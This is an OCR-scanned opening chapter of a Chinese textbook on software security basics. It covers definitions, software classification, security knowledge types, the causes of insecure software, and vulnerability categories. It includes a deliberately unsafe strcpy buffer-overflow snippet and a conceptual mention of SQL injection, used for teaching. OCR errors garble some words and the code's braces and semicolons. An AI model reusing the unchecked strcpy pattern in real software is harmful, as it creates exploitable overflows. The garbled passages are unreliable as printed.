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第 1 章 ”软件 安全 基础 


本 章 导读 

本 章 首先 介绍 软件 安全 相关 的 基本 概念 、 软 件 安全 知识 体系 和 常用 名 称 ， 以 及 软件 安全 
相关 的 常用 工具 。 然 后 介绍 软件 安全 问题 及 其 产生 的 原因 ， 列 举 常见 的 软件 缺陷 和 漏洞 ， 并 
讲解 针对 软件 安全 的 测试 方法 。 最 后 阐述 软件 安全 的 相关 标准 ， 包 括 安全 规则 与 规章 、 软 件 
安全 原则 以 及 相关 国际 标准 。 

应 掌握 的 知识 要 点 : 

。 软件 安全 的 分 类 

e 软件 安全 的 基本 概念 

e 软件 安全 问题 的 现状 

e 软件 安全 漏洞 

e 软件 安全 开发 技术 

e 软件 安全 测试 技术 

e 软件 安全 相关 标准 


1.1 软件 安全 的 分 类 


当代 社会 ， 计 算 机 应 用 的 迅速 发 展 给 人 们 的 生活 带 来 极 大 便利 。 软 件 是 计算 机 应 用 的 重 
要 组 成 部 分 ， 软 件 安全 一 直 是 软件 开发 中 的 一 个 关键 问题 。 开 发 人 员 如 何在 开发 的 全 过 程 中 
从 根本 上 提高 软件 的 安全 性 ， 是 每 个 软件 人 员 ( 包 括 系统 分 析 人 员 、 项 目 经 理 、 编码 人 员 、 测 
试 人 员 等 ) 必 须 思考 的 问题 。 本 节 将 介绍 软件 安全 相关 的 基本 概念 。 

当今 软件 安全 的 定义 包含 两 个 方面 : 软件 安全 性 (Software Safety) 和 软件 安全 (Software 
Security). 

软件 安全 性 (Software Safety) 是 指 软件 在 系统 中 运行 而 不 至 于 在 系统 工作 中 造成 不 可 接 
受 的 风险 的 能 力 ， 如 人身 伤 亡 、 设 备 损坏 、 财 产 重大 损失 、 严 重 污染 环境 等 。 

软件 安全 (Software Security) 就 是 使 软件 在 受到 恶意 攻击 的 情形 下 依然 能 够 继续 正确 运行 
及 确保 软件 在 被 授权 范围 内 能 够 合法 使 用 。 
1.1.1 软件 安全 性 (Software Safety) 


软件 本 身 不 会 造成 危险 ， 但 当 软件 用 于 过 程 监控 、 实 时 控制 、 武 器 、 航 天 、 医 疗 、 核 反 


。2。 软件 安全 测试 及 工具 应 用 (第 2 版 ) 


应 等 方面 时 ， 软 件 的 错误 能 够 通过 硬 、 软 件 接口 使 硬件 发 生 故 障 ， 从 而 造成 严重 事故 。 
这 类 软件 称 为 “安全 性 关键 软件 ”。 为 解决 这 类 问题 而 采用 的 一 系列 方法 技术 称 为 软件 
安全 性 技术 。 
软件 安全 性 工作 的 出 发 点 是 系统 安全 性 。 一 个 单独 的 软件 本 身 并 不 存在 安全 性 问题 。 
只 有 当 软 件 与 硬件 相互 作用 可 能 导致 人 员 的 生命 危险 、 或 系统 崩溃 、 或 造成 不 可 接受 的 


1) 强调 要 在 系统 环境 中 讨论 软件 安全 性 ; 
2) 软件 安全 性 是 软件 的 一 个 质量 属性 或 一 种 能 力 。 


1.1.2 ”软件 安全 (Software Security) 


尽管 在 实际 中 软件 故障 通常 是 在 没有 蓄意 攻击 的 情况 下 自然 地 产生 的 ， 而 软件 安全 关注 
保证 软件 在 遭受 恶意 攻击 时 正确 地 运行 。 软 件 安全 性 (Software Safety) 和 软件 安全 (Software 
Security) 的 区 别 在 于 是 否 存 在 专业 人 士 恶 意 侵害 、 攻 击 和 破坏 系统 。 

软件 安全 属于 软件 领域 里 一 个 重要 的 子 领域 。 在 以 前 的 单机 时 代 ， 安 全 问题 主要 是 操作 
系统 容易 传染 病毒 ， 单 机 应 用 程序 软件 安全 问题 并 不 突出 。 但 是 自从 互联 网 普及 后 ， 软 件 安 
全 问题 愈加 凸显 ， 使 得 人 们 对 软件 安全 的 重视 程度 上 升 到 一 个 前 所 未 有 的 高 度 。 

软件 安全 一 般 分 为 两 个 层次 ， 即 应 用 级 别 或 应 用 软件 的 安全 性 和 操作 系统 级 别 的 安全 
性 。 应 用 软件 的 安全 性 ， 包 括 对 数据 或 业务 功能 的 访问 ， 在 预期 的 安全 性 情况 下 ， 操 作者 只 
能 访问 应 用 软件 的 特定 功能 、 有 限 的 数据 等 。 操 作 系统 级 别 的 安全 性 是 确保 只 有 拥有 系统 平 
台 访 问 权限 的 用 户 才 能 访问 ， 包 括 对 系统 的 登录 或 远程 访问 。 

随 着 互联 网 和 基于 互联 网 的 应 用 系统 的 不 断 发 展 ， 软 件 安全 问题 日 益 严重 。 导 致 软件 出 
现 安全 问题 的 主要 原因 或 根源 是 软件 的 安全 漏洞 。 

本 书 就 是 围绕 当今 软件 安全 (Software Security) 面 临 的 问题 ， 系 统 地 阐述 如 何 做 好 软件 安 
全 的 测试 工作 。 


12 软件 安全 基本 概念 


1.2.1 软件 安全 概述 


软件 安全 (Software Security) 就 是 使 软件 在 受到 恶意 攻击 的 情形 下 依然 能 够 继续 正确 运行 
及 确保 软件 在 被 授权 范围 内 能 够 合法 使 用 。 它 是 一 个 较 新 的 专业 领域 , 直到 2001 年 才 出 现 了 
软件 安全 方面 的 学 术 资 料 ， 这 反映 出 研发 人 员 、 软 件 架构 人 员 、 计 算 机 科学 家 开始 系统 地 考 
虑 到 软件 安全 的 构建 。 随 着 这 一 新 领域 的 研究 不 断 深入 ， 开 发 人 员 开始 采用 系统 化 、 规 范 化 
和 数量 化 的 方法 来 构建 安全 的 软件 。 

针对 不 同类 型 的 工程 对 象 应 采用 不 同 的 安全 方法 ， 因 此 有 必要 从 不 同 角 度 讨 论 计算 机 软 
件 的 分 类 情况 。 

按照 功能 进行 划分 ， 软 件 可 分 为 系统 软件 、 应 用 软件 和 支撑 软件 三 个 类 别 。 
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系统 软件 是 计算 机 正常 工作 的 不 可 或 缺 的 组 成 部 分 ， 它 和 计算 机 的 硬件 紧密 配合 ， 控 制 
并 且 协 调 计算 机 系统 中 的 各 个 组 件 、 相 关 的 软件 和 数据 资源 高 效 地 工作 。 常 见 系统 软件 包括 
操作 系统 、 设 备 驱动 程序 以 及 通信 处 理 程序 等 。 

应 用 软件 是 指 在 专 一 的 领域 内 开发 ， 为 某 个 特定 目标 服务 的 软件 。 目 前 ， 人 们 在 工作 和 
生活 中 严重 依赖 计算 机 ， 很 多 应 用 领域 都 需要 专门 的 软件 支持 ， 在 种 类 繁多 的 应 用 软件 中 ， 
商业 数据 处 理 软 件 所 占 的 比例 最 大 。 此 外 ， 还 有 系统 仿真 软件 、 工 程 与 科学 计算 软件 、 人 工 
智能 软件 以 及 各 类 办 公 自动 化 软件 以 及 信息 处 理 软件 等 。 

支撑 软件 是 协助 用 户 开发 软件 的 辅助 性 工具 ， 包 括 帮助 技术 人 员 进 行 开 发 的 工具 和 帮 
助 管理 人 员 控 制 开 发 进度 的 工具 ， 如 需求 原型 制作 工具 、 设 计 工具 、 编 码 工具 和 软件 测试 
工具 等 。 
按照 软件 的 规模 进行 划分 ， 可 分 为 微型 、 小 型 、 中 型 、 大 型 、 甚 大 型 、 极 大 型 6 种 。 其 
中 ， 微 型 ， 只 是 一 个 人 ， 甚 至 是 半日 工作 在 几 天 内 完成 的 软件 ， 小 型 : 一 个 人 半年 内 完成 的 
2000 行 以 内 的 程序 ; 中 型 : 5 个 人 在 1 年 多 的 时 间 内 完成 的 5000— 50000 行 的 程序 ; 大 型 : 5 一 
10 人 在 两 年 内 完成 的 50 000—100 000 行 的 程序 ， 甚 大 型 : 100 一 1000 人 参加 用 4 一 5 年 完成 
的 具有 10 00 000 行 的 软件 项 目 ; 极 大 型 : 2000—5000 人 参加 ，10 年 内 完成 的 1000 万 行 以 内 
的 程序 ; 

按照 软件 的 工作 方式 ， 软 件 可 分 为 实时 处 理 软件 、 交 互 软件 、 批 处 理 软件 和 分 时 软件 。 

按照 软件 的 服务 对 象 范围 ， 软 件 可 以 分 为 项 目 定制 软件 和 面向 市 场 的 产品 软件 。 其 中 项 
目 定制 软件 是 指 受 到 某 个 特定 客户 委托 , 由 软件 内 容 提 供 机 构 在 合同 约束 下 开发 出 来 的 软件 。 
产品 软件 是 面向 市 场 需求 ， 由 软件 内 容 提供 机 构 开 发 出 来 后 直接 提供 给 市 场 ， 或 是 为 千 百 个 
用 户 服务 的 软件 ， 例 如 办 公 处 理 软 件 、 财 务 处 理 软件 和 一 些 常用 工具 软件 等 。 


122 ”软件 安全 知识 分 类 


软件 安全 的 知识 体系 可 分 为 三 大 类 : 描述 性 知识 、 诊 断 性 知识 和 历史 知识 。 这 三 类 共 包 
括 7 种 知识 ， 即 原则 、 方 针 、 规 则 、 弱 点 、 攻 击 程序 、 攻 击 模式 和 历史 风险 。 攻 击 程序 关系 
到 攻击 模式 、 历 史 风 险 和 弱点 ， 可 根据 原则 制定 方针 和 规则 。 
描述 性 知识 包括 原则 、 方 针 和 规则 。 原 则 和 方针 是 从 方法 论 的 高 度 (高 层 体系 结构 角度 ) 
进行 定义 和 描述 ， 规 则 是 从 程序 代码 的 角度 针对 性 地 进行 抽象 和 统一 。 描 述 性 知识 类 提供 了 
一 些 建议 ， 说 明 需 要 执行 的 内 容 和 在 构建 安全 软件 时 应 该 避免 哪些 方面 。 

诊断 性 知识 包括 攻击 模式 、 攻 击 程序 和 弱点 。 诊 断 性 知识 不 仅 包括 关于 实践 的 描述 性 陈 
述 ， 其 更 重要 的 目标 是 帮助 操作 人 员 识 别 和 处 理 导 致 安全 攻击 的 常见 问题 。 攻 击 模式 采用 较 
抽象 的 形式 来 描述 常见 的 攻击 程序 ， 这 种 形式 能 应 用 于 跨越 多 个 系统 的 情形 ， 即 在 多 个 系统 
中 均 存 在 的 攻击 模式 ， 该 知识 可 被 安全 分 析 人 员 所 利用 ， 如 基于 滥用 案例 的 可 靠 性 检测 等 。 
攻击 程序 描述 了 弱点 实例 如 何 用 来 对 特定 系统 造成 特别 的 安全 危害 。 弱 点 知识 是 对 真实 系统 
中 出 现 过 并 且 已 经 报告 的 软件 弱点 的 描述 ， 较 著名 的 弱点 和 攻击 知识 库 包 括 CVE(Common 
Vulnerabilities and Exposures) 知 识 库 、 公 共 攻 击 模式 列举 和 分 类 (Common Attack Pattem 
Enumeration and Classification) 知 识 库 。 
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历史 知识 类 包括 历史 风险 ， 有些 情况 下 也 包括 弱点 的 历史 数据 库 。 这 类 知识 还 包括 对 在 
实际 软件 开发 中 所 发 现 的 特定 问题 的 详细 描述 ， 以 及 该 问题 产生 的 影响 。 

描述 性 知识 从 战略 角度 进行 描述 ， 主 要 包括 长 期 积累 和 提炼 出 来 相对 抽象 的 知识 。 诊 断 
性 知识 从 战术 角度 进行 描述 ， 可 能 与 具体 系统 相关 ， 攻 击 模式 从 攻击 角度 描述 ， 弱 点 从 防御 
角度 描述 。 历 史 知 识 库 是 知识 的 历史 积累 和 前 后 关联 的 总 结 。 


123 ”软件 安全 的 应 用 


软件 安全 不 是 一 门 孤立 的 学 科 ， 与 很 多 软件 学 科 息 息 相 关 ， 其 中 主要 包括 ; 
1. 软件 工程 


软件 工程 是 一 门 研究 如 何 使 用 系统 化 、 规 范 化 、 数 量化 等 工程 原则 和 方法 进行 软件 开发 
和 维护 的 学 科 。 软 件 工程 采用 工程 的 概念 、 原 理 、 技 术 和 方法 来 开发 维护 软件 ， 把 成 熟 的 管 
理 方法 和 先进 的 软件 开发 技术 结合 起 来 , 应 用 到 软件 开发 和 维护 过 程 中 来 解决 软件 危机 问题 
生产 出 无 故障 的 、 及 时 交付 的 、 不 超出 预算 的 和 满足 用 户 需 求 的 软件 。 

软件 工程 是 一 种 层次 化 技术 ， 由 最 底层 至 最 上 层 分 别 为 过 程 层 、 方 法 层 、 工 具 层 和 质量 
保证 层 。 与 任何 工程 方法 一 样 ， 软 件 工程 以 质量 为 焦点 ， 而 软件 的 安全 质量 是 整体 质量 评估 
的 重 中 之 重 。 

2. 软件 保障 


根据 美国 国家 标准 与 技术 研究 院 的 定义 : 软件 保障 (Software Assurance，SA) 是 确保 软件 
过 程 和 产品 符合 需求 、 标 准 和 规程 的 有 计划 的 和 系统 的 行动 集合 。 软 件 保障 可 以 帮助 达到 两 
个 目标 : 可 信 性 ， 即 没有 可 利用 的 弱点 存在 ， 无 论 是 来 自 敌 意 的 还 是 无 意 的 企图 ， 执 行 可 预 
见 性 , 可 证 明 信 任 软件 在 执行 时 依照 所 希望 的 那样 进行 工作 。 这 些 行为 包括 需求 分 析 、 测试 、 
验证 以 及 报告 。 软 件 保障 涉及 两 个 软件 属性 : 一 个 属性 是 质量 ， 也 就 是 说 软件 保障 是 软件 质 
量 保障 的 简短 形式 ， 另 一 个 属性 是 可 靠 性 ， 特 别 是 可 靠 性 中 最 重要 的 内 容 ， 即 安全 。 

3. 软件 质量 


软件 质量 是 贯穿 软件 生存 期 的 一 个 极 重 要 的 元 素 ， 是 软件 开发 过 程 中 所 使 用 的 各 种 开发 
技术 和 验证 方法 的 最 终 体 现 。 因 此 ， 在 软件 生存 期 中 要 特别 重视 软件 质量 的 保证 ， 以 生成 高 
质量 的 软件 产品 。 
以 下 基本 概念 从 不 同 的 方面 体现 了 软件 的 质量 : 
。 软件 可 靠 性 ;在 规定 条 件 及 时 间 内 ， 软 件 不 引起 系统 失效 的 概率 。 它 与 软件 中 的 缺 
陷 、 系 统 输 入 和 系统 使 用 有 关 
。 可 维护 性 ;产品 在 规定 的 条 件 和 时 间 内 ， 按 规定 的 程序 和 方法 进行 维修 ， 保 持 或 恢 
复 到 规定 的 状态 的 能 力 ; 
。 可 用 性 : 产品 在 任意 时 刻 需要 和 开始 执行 任务 时 ， 处 于 可 工作 或 可 使 用 状态 的 程度 ; 
。 安全 性 ;将 伤害 或 损坏 的 风险 限制 在 可 接受 水 平 内 的 能 力 ; 
。 机 密 性 :避免 未 经 许可 泄漏 信息 的 能 力 ; 
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。 完整 性 ， 避 免 不 适 当地 执行 更 改 的 能 力 

。 经 济 性 : 通常 用 生命 周期 费用 (Life Cycle Cost) 表 示 软 件 开发 过 程 中 的 成 本 开销 。 它 
可 以 定义 为 : 在 产品 的 生命 周期 内 ， 在 产品 设计 、 研 究 和 研制 、 投 资 、 使 用 、 维 修 
及 保障 中 发 生 的 或 可 能 发 生 的 一 切 直接 的 、 间 接 的 、 派 生 的 或 非 派生 的 费用 的 总 和 。 

上 述 中 的 可 用 性 、 安 全 性 、 机 密 性 、 完 整 性 正 是 计算 机 安全 的 四 大 目标 。 

4. 软件 容错 性 


软件 容错 性 是 指 软件 运行 时 ， 能 对 非 正常 因素 引起 的 运行 错误 给 出 适当 的 处 理 或 信息 提 


示 ， 使 软件 正常 结束 运行 。 容 错 技术 是 软件 可 靠 性 技术 中 一 个 非常 重要 的 方面 。 容 错 技术 是 
对 某 些 无 法 避 开 的 差错 ， 使 其 影响 减 至 最 小 的 技术 。 软 件 容错 技术 提供 足够 的 元 余 信息 与 算 
法 程序 ， 使 系统 在 实际 运行 中 能 允许 、 预 见 、 判 别 、 纠 正 运行 中 可 能 出 现 的 错误 ， 恢 复 和 保 
持 系 统 的 正常 运行 。 元 余 包 括 结构 郊 余 、 信 息 元 余 和 时 间 宛 余 。 


容错 技术 包括 以 下 几 个 主要 方面 ; 

。 故障 检测 技术 ;故障 检测 技术 是 在 软件 中 的 故障 暴露 时 ， 能 对 由 此 引起 的 故障 产生 
响应 的 过 程 。 在 进行 故障 检测 时 ， 需 要 用 到 一 个 重要 概念 : 软件 断言 。 软 件 在 宿主 
系统 中 运行 时 ， 使 其 中 的 诊断 程序 能 对 其 进程 或 功能 是 否 正确 做 出 判断 的 条 件 称 为 
软件 断言 。 

。 故障 恢复 技术 : 软件 执行 过 程 中 不 需要 对 每 一 步 都 进行 检测 。 通 常 在 软件 执行 过 程 
中 设置 若干 检测 点 ， 而 恢复 点 是 执行 过 程 中 预 置 的 能 保存 和 设 定 的 用 于 恢复 的 起 始 
状态 点 。 故 障 恢 复 一 般 有 两 种 策略 ， 即 前 向 恢复 和 后 向 恢复 。 

。 破坏 估计 :为 检测 到 的 故障 提供 一 种 有 效 恢复 手段 以 使 系统 恢复 到 正常 工作 状态 或 
某 种 预 置 的 状态 是 容错 的 主要 策略 。 但 是 ， 完 整 的 容错 技术 除了 检测 和 恢复 外 ， 如 
何 对 故障 引起 的 破坏 做 出 正确 估计 ， 隔 离 故 障 ， 以 及 如 何在 恢复 后 提供 继续 服务 等 
技术 不 可 缺少 。 

。 故障 隔离 技术 。 主 动 地 采取 措施 ， 防 止 故障 破坏 性 蔓延 的 技术 。 采 用 了 故障 隔离 技 
术 的 系统 ， 由 于 抑制 了 故障 的 扩散 ， 有 利于 容错 的 实现 。 

。 继续 服务 。 系 统 从 故障 中 恢复 到 故障 前 某 一 状态 或 预先 设计 好 的 其 他 状态 ， 经 历 恢 
复 后 得 到 的 服务 能 够 被 需求 规范 接受 。 

5. 软件 应 用 安全 


应 用 安全 关注 应 用 系统 的 安全 性 或 网 络 应 用 层 的 安全 性 ,包括 如 何 保护 软件 以 及 运行 的 


系统 ， 使 用 的 关键 方法 包括 沙 盒 (Sand Boxing) 防 御 恶 意 代码 的 代码 混淆 、 监 控 程序 运行 时 状 
态 (例如 输入 操作 的 监控 )、 强 制 使 用 安全 策略 等 。 软 件 安全 关注 如 何 构建 安全 的 软件 ， 包 括 
如 何 设计 安全 的 软件 、 如 何 确认 软件 的 安全 性 。 


根据 应 用 系统 的 不 同 ， 可 将 应 用 安全 进一步 细 分 ， 例 如 数据 库 安 全 、Web 安全 、 网 络 游 


戏 安全 和 电子 邮件 安全 等 。 与 应 用 安全 处 于 同一 层次 的 安全 性 问题 包括 : 操作 系统 安全 ， 主 
要 研究 操作 系统 软件 的 安全 性 ;网 络 安全 ， 研 究 网 络 系统 的 安全 性 。 
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1. ”软件 安全 问题 的 现状 


现代 信息 生活 中 ， 计 算 机 系统 的 安全 问题 越 来 越 受到 重视 。 软 件 是 组 成 计算 机 应 用 的 重 
要 部 分 ， 当 软件 由 于 漏洞 而 遭受 攻击 ， 或 者 运行 期 间 出 现 错误 时 ， 会 给 用 户 带 来 巨大 损失 : 
如 犯罪 分 子 利用 软件 漏洞 来 获取 有 价值 的 信息 ， 用 于 牟取 利益 ， 又 如 软件 因为 开发 时 没有 考 
虑 运行 时 的 具体 情况 ， 而 造成 运行 的 突然 月 省 等 。 
1.3.1 软件 安全 问题 的 现状 及 产 因 


通常 ， 软 件 不 安全 性 的 直接 受害 者 就 是 用 户 。 因 此 ， 从 用 户 角度 出 发 ， 典 型 安全 问题 表 
现在 以 下 4 个 方面 : 

1) 使 用 某 些 交 易 软 件 的 过 程 中 ， 某 些 敏 感 信 息 (如 个 人 身份 信息 、 个 人 卡号 密码 等 信息 ) 
被 攻击 者 获取 并 用 于 牟利 。 

2) 访问 某 些 网 站 时 ,服务 器 响应 缓慢 , 或 者 服务 器 由 于 访问 量 造成 负载 过 大 ， 造 成 突然 

3) 系统 中 安装 了 存在 漏洞 的 软件 , 漏洞 没有 解决 , 攻击 者 找到 漏洞 并 对 该 系统 进行 攻击 ， 
造成 系统 瘫痪 。 

4) 用 户 耗 费 精力 完成 了 一 幅 漂 亮 的 风景 画 ， 在 互联 网 发 布 ， 没 有 考虑 版 权 ， 被 他 人 随 
意 使 用 却 无 法 问 责 。 

总 之 ， 软 件 的 不 安全 性 主要 体现 在 两 个 方面 。 

-方面 软件 在 运行 过 程 中 不 稳定 ， 出 现 异常 现象 、 得 不 到 正常 结果 ， 或 在 特殊 情况 下 由 
于 一 些 原因 造成 系统 崩溃 。 比 如 : 由 于 异常 处 理 不 当 ， 软 件 运行 期 间 直 到 突 发 问题 ， 处 理 异 
常 之 后 无 法 释放 资源 ， 导 致 这 些 资源 被 锁定 无 法 使 用 ， 由 于 线程 处 理 不 当 ， 软 件 运行 中 莫名 
其 妙 得 不 到 正常 结果 ; 由 于 网 络 连接 处 理 不 当 ， 网 络 软件 运行 过 程 中 ， 内 存 消 耗 越 来 越 大 ， 
系统 越 来 越 慢 ， 最 后 崩溃 ， 由 于 编程 没有 进行 优化 ， 程 序 运行 消耗 资源 过 大 等 。 

另 一 方面 ， 攻 击 者 利用 各 种 方式 攻击 软件 ， 达 到 窃取 信息 、 破 坏 系统 等 目的 。 比 如 : 攻 
击 者 通过 一 些 手段 获取 数据 库 中 的 明文 密码 ; 攻击 者 利用 软件 的 缓冲 区 溢出 ， 运 行 敏感 的 函 
数 ; 攻击 者 利用 软件 对 数据 的 校 验 不 全 面 ， 给 用 户 发 送 虚假 信息 ; 攻击 者 对 用 户 进行 拒绝 服 
务 攻 击 等 。 

下 面 阐述 软件 不 安全 的 原因 。 首 先 ， 站 在 软件 开发 者 的 角度 ， 软 件 不 安全 的 原因 可 以 归 
纳 为 以 下 几 种 : 

1) 软件 生产 没有 严格 遵守 软件 工程 流程 。 由 于 缺乏 经 验 或 主观 (如 片面 追求 进度 ) 原 因 ， 
软件 的 设计 者 和 开发 者 没有 进行 统一 管理 ， 可 以 在 软件 开发 周期 的 任意 时 候 ， 随 意 删除 、 新 
增 或 修改 软件 需求 规格 说 明 书 、 威 胁 模型 、 设 计 文档 、 源 代码 、 整 合 框架 、 测 试用 例 和 测试 
结果 、 安 装配 置 说 明 书 ， 使 得 软件 的 安全 性 减弱 。 

2) 编码 者 没有 采用 科学 的 编码 方法 。 在 软件 开发 过 程 中 没有 考虑 软件 可 能 出 现 的 问题 ， 
仅 将 能 想到 的 问题 停留 在 实验 室内 进行 解决 。 实 际 上 ， 有 些 程序 ， 在 实验 室 阶 段 根本 不 会 出 
现 安全 隐患 ， 如 : 
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void function(char *input) 
t 
char buffer[16]: 
strcpy(buffer, input); 
Į 


表示 将 input 字符 串 复制 到 buffer 中 ， 如 果 没有 考虑 缓冲 区 溢出 ， 即 使 在 开发 阶段 的 测 
试 过 程 中 让 这 个 函数 产生 缓冲 区 溢出 ， 也 不 会 产生 攻击 效果 。 只 有 在 精心 设计 后 ， 才 可 能 对 
系统 造成 攻击 。 因 此 在 开发 阶段 很 难 意识 到 这 个 问题 ， 使 得 软件 留 下 安全 隐患 。 

3) 测试 不 完全 。 主要 是 测试 用 例 的 设计 无 法 涵盖 所 有 安全 问题 。 如 常见 的 通过 用 户 名 和 
密码 进行 登录 的 表单 ， 一 般 测试 用 例 只 是 设计 输入 正确 的 用 户 名 和 密码 ， 看 能 否 正常 登录 ; 
再 输入 错误 的 用 户 名 和 密码 , 看 能 否 得 到 相应 的 错误 提示 。 但 攻击 者 如 果 输 入 某 些 与 SQL 注 
入 有 关 的 值 ， 就 可 能 在 不 需要 知道 用 户 名 和 密码 的 情况 下 登录 到 系统 ， 甚 至 知道 系统 中 的 其 
他 信息 或 对 系统 中 的 内 容 进行 修改 。 

因此 ， 这 些 安全 问题 应 该 在 软件 开发 过 程 中 就 充分 考虑 到 。 在 新 时 期 ， 对 软件 的 开发 提 
出 了 两 个 新 要 求 : 使 软件 更 高 级 和 提高 可 扩展 性 。 这 两 个 要 求 促 进 了 软件 工程 应 用 和 研究 的 
发 展 ， 但 也 使 软件 安全 变 得 更 富有 挑战 性 。 一 方面 ， 软 件 复 杂 性 提高 ， 安 全 问题 也 趋 于 复杂 ， 
无 法 得 到 全 面 考虑 ， 而 工程 进度 又 迫使 开发 者 不 得 不 在 一 定时 间 内 交付 产品 ， 代 码 越 多 ， 漏 
洞 和 缺陷 也 就 越 多 ， 另 一 方面 ， 软 件 的 可 扩展 性 要 求 越 来 越 高 ， 系 统 升级 和 性 能 扩展 成 为 很 
多 软件 必 备 的 功能 ， 可 扩展 性 好 的 系统 ， 由 于 能 够 用 较 少 的 成 本 扩充 功能 ， 受 到 开发 者 和 用 
户 的 欢迎 ; 但 针对 可 扩展 性 必须 进行 相应 的 设计 , 软件 结构 变 得 复杂 。 添加 新 的 功能 的 同时 ， 
也 引入 了 新 的 风险 。 

然后 ， 从 软件 工程 的 角度 客观 地 分 析 ， 软 件 的 安全 性 隐患 又 源 于 以 下 几 个 方面 : 

1) 软件 复杂 性 和 工程 进度 的 平衡 。 软 件 复杂 性 提高 ,不仅 是 编码 工作 量 的 提高 ,更 重要 
的 是 其 中 需要 考虑 的 问题 更 复杂 ， 测 试用 例 规 模 也 呈 指 数 级 增长 。 但 工程 进度 只 是 按照 软件 
规模 进行 适当 延长 ， 很 多 问题 没 能 解决 便 投入 使 用 。 

2) 安全 问题 的 不 可 预见 性 。 主 要 是 软件 工程 师 不 了 解 运行 的 实际 情况 , 在 测试 时 做 出 过 
于 简单 的 假设 。 无 法 安全 考虑 一 部 分 问题 ， 包 括 对 软件 的 功能 、 输 出 和 软件 运行 环境 的 行 
为 状态 ， 或 者 外 部 实体 (用 户 、 软 件 进程 ) 的 预期 输入 。 攻 击 者 有 足够 的 时 间 进 行 攻击 方法 
的 研究 。 

3) 由 于 软件 需求 的 变动 。 软件 规 格 说 明 书 或 设计 文档 无 法 一 开始 就 确定 下 来 ; 在 现代 软 
件 工 程 中 ， 很 多 软件 的 需求 变动 ， 导 致 其 设计 本 来 就 是 变动 的 ， 很 多 安全 问题 可 能 在 变动 的 
过 程 中 被 忽略 。 

4) 软件 组 件 之 间 交 互 的 不 可 预见 性 。 如 客户 在 使 用 软件 的 过 程 中 ， 自 行 安装 第 三 方 提 
供 的 组 件 ， 开 发 者 根本 无 法 知道 客户 的 软件 将 和 谁 交互 ， 软 件 在 运行 过 程 中 可 能 会 出 现 安 
全 问题 。 

可 见 软 件 的 安全 问题 无 法 完全 避免 。 即 使 在 需求 分 析 和 设计 时 可 以 避免 ， 或 者 在 开发 时 
可 以 避免 ， 但 缺陷 还 是 会 在 软件 汇编 、 集 成 、 部 署 和 运行 时 被 引入 。 不 管 如 何 忠实 地 遵守 一 
个 基于 安全 的 开发 过 程 ， 只 要 软件 的 规模 和 复杂 性 继续 增长 ， 一 些 可 被 挖掘 出 来 的 错误 和 其 
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他 缺陷 是 必然 存在 的 。 因 此 ， 安 全 编程 技术 不 是 为 了 消除 安全 隐患 ， 而 是 为 了 尽量 减少 安全 
隐患。 


13.2 ”软件 安全 漏洞 


我 们 从 上 文中 可 以 看 出 软件 安全 问题 的 技术 产 因 主 要 来 自 缺 陷 和 漏洞 。IEBE 标准 
729-1983 中 对 软件 缺陷 给 出 了 一 个 标准 定义 :从 产品 内 部 看 ， 软 件 缺 陷 是 软件 产品 开发 或 维 
护 过 程 中 存在 的 错误 、 缺 点 等 各 种 问题 。 从 外 部 看 ， 软 件 缺 陷 是 系统 所 要 实现 的 某 种 功能 外 
失效 或 违背 。 漏 洞 则 是 系统 设计 、 实 现 和 操作 管理 中 存在 的 缺陷 和 弱点 ， 它 们 可 以 被 用 来 韦 
背 系统 的 安全 策略 。 

仅 从 安全 的 角度 进一步 分 析 漏洞 ， 安 全 漏洞 特 指 硬件 、 软 件 、 协 议 在 逻辑 设计 上 或 具体 
实现 或 系统 安全 策略 上 存在 的 缺陷 或 错误 ， 这 些 缺 陷 或 错误 可 以 被 不 法 者 或 者 电脑 黑客 利用 
来 获得 计算 机 系统 的 额外 权限 ， 在 未 授权 或 提高 权限 的 情况 下 通过 植 入 木马、 病毒 等 方式 来 
攻击 或 控制 整个 电脑 ， 从 而 窃取 电脑 中 的 重要 资料 和 信息 ， 甚 至 破坏 系统 。 具 体 举例 来 说 ， 
比如 在 Intel Pentium. 芯片 中 存在 的 逻辑 错误 ,在 Sendmail 早期 版 本 中 的 编程 错误 ,在 NFS 协 
议 中 认证 方式 上 的 弱点 ， 在 UNIX 系统 管理 员 设置 匿名 Fip 服务 时 配置 不 当 的 问题 都 可 能 被 
攻击 者 使 用 ， 威 胁 到 系统 的 安全 。 

1 安全 漏洞 产生 的 原因 


根据 漏洞 出 现 的 阶段 ， 软 件 安全 漏洞 可 分 为 两 大 类 : 设计 漏洞 和 实现 漏洞 。 

1) 设计 漏洞 是 软件 设计 阶段 发 生 的 设计 错误 ， 无 论 编码 人 员 如 何 实现 ， 都 存在 安全 
问题 。 常 见 的 设计 漏洞 有 如 下 两 个 方面 : 一 是 密码 技术 使 用 不 当 ， 如 选择 错误 的 密码 
方法 (对 称 密码 算法 、 非 对 称 密码 算法 、 哈 希 函数 等 ) 来 完成 加 密 、 完 整 性 检验 和 认证 等 。 
在 使 用 密码 技术 时 ， 没 有 使 用 标准 化 的 成 熟 算法 ， 如 AES. RSA 等 ， 而 是 自 创 一 套 未 得 到 
公开 研究 和 验证 的 密码 算法 。 即 使 是 使 用 现 有 的 成 熟 算法 ， 也 没有 使 用 较 知 名 的 密码 库 ， 如 
Microsoft Crypto API 或 OpenSSL， 而 是 自己 编写 的 或 来 源 于 不 知名 的 密码 库 。 二 是 安全 需 
求 不 明确 ， 在 系统 分 析 阶 段 没 有 明确 安全 的 需求 ， 对 威胁 没有 明确 的 建立 模型 。 

2) 实现 漏洞 是 由 软件 编码 中 的 安全 缺陷 造成 的 ， 如 没有 检测 返回 代码 、 没 有 正确 定 
义 缓冲 区 的 大 小 、 没 有 正确 处 理 非 预期 的 输入 等 。 

2. 安全 漏洞 的 危害 


安全 漏洞 的 存在 会 对 系统 造成 很 严重 的 危害 ， 因 为 它 可 能 会 被 攻击 者 利用 ， 继 而 破坏 系 
统 的 安全 特性 ， 而 它 本 身 不 会 直接 对 系统 造成 危害 。 通 常 而 言 ， 漏 洞 会 对 以 下 五 种 系统 安全 

1) 系统 的 完整 性 (Integrity): 攻击 者 可 利用 漏洞 入 侵 系 统 ， 对 系统 数据 进行 非法 算 改 ， 
从 而 达到 破坏 数据 完整 性 的 目的 ; 

2) 系统 的 可 用 性 (Availability): 攻击 者 利用 漏洞 破坏 系统 或 者 网 络 的 正常 运行 ， 导 致 信 
息 或 网 络 服务 不 可 用 ， 合 法 用 户 的 正常 服务 要 求 得 不 到 满足 ; 

3) 系统 的 机 密 性 (Confidentiality): 攻击 者 利用 漏洞 给 非 授权 的 个 人 和 实体 泄漏 受 保护 
